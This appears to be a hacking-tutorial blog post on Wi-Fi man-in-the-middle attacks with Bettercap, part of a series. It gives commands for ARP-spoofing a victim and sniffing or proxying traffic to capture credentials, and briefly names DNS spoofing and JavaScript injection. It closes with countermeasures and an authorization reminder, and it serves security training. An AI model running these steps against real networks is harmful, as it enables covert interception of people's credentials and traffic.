Hack That Shit
MITM Attacks with Bettercap (Wi-Fi Edition)

MITM Attacks with Bettercap (Wi-Fi Edition)

by

💡 Introduction

So far in this series, we’ve focused on gaining access to Wi-Fi networks. But once you’re inside the network, what’s next?

Welcome to Man-in-the-Middle (MITM) attacks — where you silently intercept, monitor, and manipulate traffic from unsuspecting devices. In this post, we’ll use Bettercap, a powerful framework for MITM attacks, traffic sniffing, and real-time manipulation.

❓ What is a MITM Attack?

In a MITM attack, the hacker positions themselves between the victim and the router, intercepting all the traffic flowing through.

They can:

  • Capture login credentials

  • Sniff unencrypted traffic

  • Modify requests or responses

  • Inject JavaScript or malicious code

Think of it like secretly reading someone’s mail before it reaches them.

⚙️ Tools Needed

  • Kali Linux (or any Linux distro with Bettercap)

  • Internal access to Wi-Fi network

  • Bettercap installed (sudo apt install bettercap)

  • Wi-Fi adapter in managed mode (not monitor mode)

Step-by-Step: Performing a MITM Attack with Bettercap

1. Connect to Target Network

Connect your machine to the same Wi-Fi network as the victim.
No cracking is needed — just be on the same network.

2. Enable IP Forwarding

Enable IP forwarding to route traffic through your machine:

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

3. Start Bettercap

Launch Bettercap with root privileges:

sudo bettercap -iface wlan0

Replace wlan0 with your actual interface name if different.

4. Discover Devices

Once inside the Bettercap console, scan for live hosts:

net.probe on
net.recon on
net.show

This will list all connected devices on the network.
Find and note the IP address of your target.

5. Launch MITM via ARP Spoofing

Set the target IP and start the spoofing attack:

set arp.spoof.targets <victim_ip>
arp.spoof on

You’re now positioned between the router and the target — intercepting traffic.

6. Sniff Credentials and Monitor Traffic

To sniff packets and monitor unencrypted data, use:

net.sniff on

Alternatively, enable HTTP proxy mode to intercept HTTP requests:

http.proxy on

With this, you’ll capture:

  • Login forms
  • GET/POST requests
  • Unencrypted credentials (if the site is not using HTTPS)

Advanced Modules (Optional)

  • dns.spoof on – Fake DNS responses

  • inject.js – Inject JavaScript into pages

  • https.proxy – Intercept HTTPS traffic (with caveats)

Bettercap also supports scripting and logging to automate attacks.

Real-World Countermeasures

  • Use HTTPS Everywhere

  • Deploy DNS over HTTPS (DoH)

  • Use VPNs on public Wi-Fi

  • Monitor ARP tables for poisoning

  • Apply client isolation on routers

Ethical Reminder

MITM attacks are extremely invasive and illegal without explicit authorization. This tutorial is intended for authorized lab environments, penetration testing, and cybersecurity training only.

Wrapping Up

Bettercap gives you full control once you’re inside a Wi-Fi network — from sniffing plain-text credentials to injecting scripts. It’s a powerful tool for both offensive research and defensive awareness.

Next up:
🛡️ Part 13 – How to Secure Your Wi-Fi from Hackers

1 thought on “MITM Attacks with Bettercap (Wi-Fi Edition)”

  1. Pingback: WPS Attacks with Reaver & Bully

Leave a comment

Table of Contents

Index